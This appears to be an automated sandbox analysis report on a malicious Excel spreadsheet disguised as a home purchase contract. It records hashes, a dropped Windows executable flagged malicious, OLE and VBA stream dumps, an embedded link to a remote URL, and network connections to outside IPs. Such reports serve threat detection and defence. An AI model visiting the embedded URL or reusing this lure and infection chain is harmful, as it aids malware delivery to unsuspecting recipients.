                                                    MD5:3560042612EE429B1885C3BB21FEF9E0
                                                    SHA1:DD3017011BE338C523D64CAA83720AD31D071DC0
                                                    SHA-256:0B1DF2838ABCD03DAC0C056A5A2C661F6E3C9F23ADD7CD2BD75F468BF48B3E38
                                                    SHA-512:4F234E906A20FE2E817F8657D2698B8AF88E5A0E0C4635FBF6F197640F77B250A46AA27FF1697EE65992C99ED9E80AA26BCF386132B08C35B0EAB69771CD4C8A
                                                    Malicious:true
                                                    Preview:...Y#..K.........!......%$.&$...!$.! #.$....'#......#.....Y#..KP..!$...#.....Y#..Kt]q{tmn^qce].-.U......v..J.'.#..LSttj.h Nzs...y[%...:.WG.../p.I.v.J...*0...l`w"I....:..tZ....G.......x...-~.fm.$P7.x....m..c...s..D]...1Y....O4X.!.....} .e.V..9.'.!.G..n..).US...1U...k$t....G.Pf^.ygJ.&.6.L..S......~....\........PMrqa.{|.zv2.%.C.c.9bZz..$.4%!G..,...1...,.....".9..R/.(.;_...X9O'..+..6..4X....W^uW.....EULO...L.EX.rW.".H.I...bo.h...v.f..b..-.&x...../S..~..^....I.[iCS...I.'.D.Ix...'%:V..KV."{_.7z...F}!.,......]f`.iO...\T.._1SPs=app$]S.3...m0V^Dqc\,a.^DeX..gg.'..S..`...x-[=..s.....rx..Sx.n....]v.z...$.<..ro.V.'.C.._...=U.Y..|'%Ky.p.s./.L.k..-.a....c.9O..~!.I{{. .V..O.:.u1...0../......G.1....H.$.8..._K..%.D.my.G.k.....~krw../..cJiG..Kz..d.vucS..'JL..#PJR.Sz..^.....^Wx.]....:.9.)p....;`E.$.9N....Fa...QSZ._.suus...._.n._n...)...wLfZ..&..1Sb....o..4{{.a.q~..L.pyt.i.R....c]v.14.lkU.'.4...zc\Fdh.qw.japp.lwap,.bU..mn^....by.~".H...qwb.b...._wn{2l\..)..wapH2?...8..qc]E`w...`]f.7~.E
                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1388544
                                                    Entropy (8bit):5.5299258127514435
                                                    Encrypted:false
                                                    SSDEEP:24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
                                                    MD5:913C99449A29C2640D36B0D5FDF69289
                                                    SHA1:858971F52AB45DC8BE5F2C43DA9B0C25BA398435
                                                    SHA-256:39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
                                                    SHA-512:B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................
                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 08:00:55 2024, Security: 1
                                                    Entropy (8bit):7.860131766399966
                                                    TrID:
                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                    File name:Home Purchase Contract and Property Details.xls
                                                    File size:251'392 bytes
                                                    MD5:d9d5c1fa0851c35ace66d98089584cbe
                                                    SHA1:9fe664c1645be3bb5bd9b3f1292993f247600155
                                                    SHA256:777fe31b0202e8e5cf13a9d1d9dea155bfd6e569392714d1e8f61d20048e70ba
                                                    SHA512:21a1ae0f92dc7d63a1a29494358bdcd7bd38fe633bb41e29ab356d10e528ee07bcd19c53f8593ca1bd4b4caf2b1f98b233c080b00d5be07d5660e2154043c1c7
                                                    SSDEEP:6144:me4UcLe0JOqPQZR8MDdATCR3tSFHjTHxzF4ani/LaqBC:sUP/qPQZR8MxAm/StjDxzuai+e
                                                    TLSH:1B34F1317E78D043DA60807878CE89D3AF26FD91AF41714F3620739EAA33594DD12A9E
                                                    File Content Preview:........................>...................................+...........................n......................................................................................................................................................................
                                                    Icon Hash:276ea3a6a6b7bfbf
                                                    Document Type:OLE
                                                    Number of OLE Files:1
                                                    Has Summary Info:
                                                    Application Name:Microsoft Excel
                                                    Encrypted Document:True
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:True
                                                    Code Page:1252
                                                    Author:
                                                    Last Saved By:
                                                    Create Time:2006-09-16 00:00:00
                                                    Last Saved Time:2024-05-23 07:00:55
                                                    Creating Application:Microsoft Excel
                                                    Security:1
                                                    Document Code Page:1252
                                                    Thumbnail Scaling Desired:False
                                                    Contains Dirty Links:False
                                                    Shared Document:False
                                                    Changed Hyperlinks:False
                                                    Application Version:786432
                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                    VBA File Name:Sheet1.cls
                                                    Stream Size:977
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 14 db 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Attribute VB_Name = "Sheet1"
                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                    Attribute VB_GlobalNameSpace = False
                                                    Attribute VB_Creatable = False
                                                    Attribute VB_PredeclaredId = True
                                                    Attribute VB_Exposed = True
                                                    Attribute VB_TemplateDerived = False
                                                    Attribute VB_Customizable = True
                                                    

                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                    VBA File Name:Sheet2.cls
                                                    Stream Size:977
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 f2 38 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Attribute VB_Name = "Sheet2"
                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                    Attribute VB_GlobalNameSpace = False
                                                    Attribute VB_Creatable = False
                                                    Attribute VB_PredeclaredId = True
                                                    Attribute VB_Exposed = True
                                                    Attribute VB_TemplateDerived = False
                                                    Attribute VB_Customizable = True
                                                    

                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                    VBA File Name:Sheet3.cls
                                                    Stream Size:977
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 94 be 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Attribute VB_Name = "Sheet3"
                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                    Attribute VB_GlobalNameSpace = False
                                                    Attribute VB_Creatable = False
                                                    Attribute VB_PredeclaredId = True
                                                    Attribute VB_Exposed = True
                                                    Attribute VB_TemplateDerived = False
                                                    Attribute VB_Customizable = True
                                                    

                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                    VBA File Name:ThisWorkbook.cls
                                                    Stream Size:985
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 1d 55 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Attribute VB_Name = "ThisWorkbook"
                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                    Attribute VB_GlobalNameSpace = False
                                                    Attribute VB_Creatable = False
                                                    Attribute VB_PredeclaredId = True
                                                    Attribute VB_Exposed = True
                                                    Attribute VB_TemplateDerived = False
                                                    Attribute VB_Customizable = True
                                                    

                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:114
                                                    Entropy:4.25248375192737
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:244
                                                    Entropy:2.889430592781307
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:200
                                                    Entropy:3.3020681057018666
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . - . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                    General
                                                    Stream Path:MBD00099100/\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:99
                                                    Entropy:3.631242196770981
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:MBD00099100/Package
                                                    CLSID:
                                                    File Type:Microsoft Excel 2007+
                                                    Stream Size:150104
                                                    Entropy:7.951044443183293
                                                    Base64 Encoded:True
                                                    Data ASCII:P K . . . . . . . . . . ! . - N . . . C . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 2d ca 4e f7 b1 01 00 00 43 06 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:MBD00099101/\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:862
                                                    Entropy:5.488004408870525
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . ' $ . l - . r . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . : . / . / . q . r . - . i . n . . . c . o . m . / . N . A . v . S . G . z . Z . . . { O . j 3 . ) R X k . u > S I % 5 . x B I . . 0 Q k o h . ? o B d G a . ] . d . n { C w Q / . l z I a w Q O . W j . k . ~ F . G 4 | . . e K . < . . : ~ c . D ! W 6 . % L ( . 3 . . . . . Y + U . p m T | Z + M z . H ' . Y v C T . | . , k D f X . w y : . . . . . . . . . . . . . . . . . . . p . 0 . P . z . M . h . W . 6 . Y . X . p . 3
                                                    Data Raw:01 00 00 02 27 24 7f 6c 2d da 8a 72 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 0c 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 71 00 72 00 2d 00 69 00 6e 00 2e 00 63 00 6f 00 6d 00 2f 00 4e 00 41 00 76 00 53 00 47 00 7a 00 5a 00 00 00 7b 4f 9e 0d c0 6a 33 f8 11 29 52 d0 58 f3 a0 6b 00 de e7 75 3e f8 53 ad 49 84 b2 25 9a 35
                                                    General
                                                    Stream Path:Workbook
                                                    CLSID:
                                                    File Type:Applesoft BASIC program data, first line number 16
                                                    Stream Size:84851
                                                    Entropy:7.990591704325821
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ( T ] : o C . w | . W | 4 . 1 4 ; . 2 p . ^ . : | . n . . . . . . . # . . . \\ . p . o \\ F / { . c " _ j 1 . . . + * + . e | 9 K . g . s Z ( . a $ - " . e . r . . 9 + . Q b . W t . 4 s w k q > B . . . A a . . . . . . . = . . . 0 B . . . . ] V 9 = + B . h D . . . = . . . . D o . . . . . . . . . E . . . P . . . ( . = . . . C ( _ . . v . Y S @ . . . 2 . . . " . . . . . . . . D o . . . . . . . S 1 . . . K m . . t ' . . 8 . r K . ' ? - . . R = 1 . . . z S
                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 93 a5 9d bf 28 9c 54 5d a2 e1 3a 6f 43 14 fa 94 77 8c 7c 91 1c a3 90 b7 57 7c 34 02 31 e1 b3 34 3b 03 32 dc 70 10 f1 fd 5e 14 3a 7c 1e ea eb 6e e1 00 02 00 b0 04 c1 00 02 00 23 e7 e2 00 00 00 5c 00 70 00 df 6f 5c fc dd fb e5 dd 46 82 e7 2f b9 7b 1f a6 63 90 22 5f bc ff 6a 31 bd 15 09 fb b8 da
                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                    CLSID:
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Stream Size:517
                                                    Entropy:5.234625546953192
                                                    Base64 Encoded:True
                                                    Data ASCII:I D = " { 9 B F 6 6 5 7 0 - F 4 F 3 - 4 6 6 8 - B 3 F E - E 7 A 8 F F E 9 D F 3 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 1 3 3 1 E 6 6 2 2 6 6 2 2 6 6 2
                                                    Data Raw:49 44 3d 22 7b 39 42 46 36 36 35 37 30 2d 46 34 46 33 2d 34 36 36 38 2d 42 33 46 45 2d 45 37 41 38 46 46 45 39 44 46 33 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:104
                                                    Entropy:3.0488640812019017
                                                    Base64 Encoded:False
                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:2644
                                                    Entropy:3.9957371995480346
                                                    Base64 Encoded:False
                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                    General
                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:553
                                                    Entropy:6.373714170133797
                                                    Base64 Encoded:True
                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ^ h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bf 8e 5e 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 23, 2024 20:20:51.836338997 CEST4916180192.168.2.22188.114.96.3
                                                    May 23, 2024 20:20:51.851815939 CEST8049161188.114.96.3192.168.2.22
                                                    May 23, 2024 20:20:51.851923943 CEST4916180192.168.2.22188.114.96.3
                                                    May 23, 2024 20:20:51.852160931 CEST4916180192.168.2.22188.114.96.3
                                                    May 23, 2024 20:20:51.867361069 CEST8049161188.114.96.3192.168.2.22
                                                    May 23, 2024 20:20:52.967098951 CEST8049161188.114.96.3192.168.2.22
                                                    May 23, 2024 20:20:52.967164993 CEST4916180192.168.2.22188.114.96.3
                                                    May 23, 2024 20:20:52.981614113 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:52.989701986 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:52.989758015 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:52.989835024 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.000576973 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.629616976 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.629635096 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.629749060 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.630474091 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.630503893 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.630515099 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.630525112 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.630551100 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.630551100 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.631341934 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.631355047 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.631386995 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.632226944 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.632241964 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.632255077 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.632272959 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.632288933 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.635812998 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.639336109 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.639405966 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.639691114 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.639731884 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.640256882 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.640275955 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.640320063 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.640320063 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.717319012 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.717417955 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.717662096 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.717706919 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.717957020 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.717997074 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.718266964 CEST804916294.156.67.72192.168.2.22
                                                    May 23, 2024 20:20:53.718311071 CEST4916280192.168.2.2294.156.67.72
                                                    May 23, 2024 20:20:53.720192909 CEST804916294.156.67.72192.168.2.22
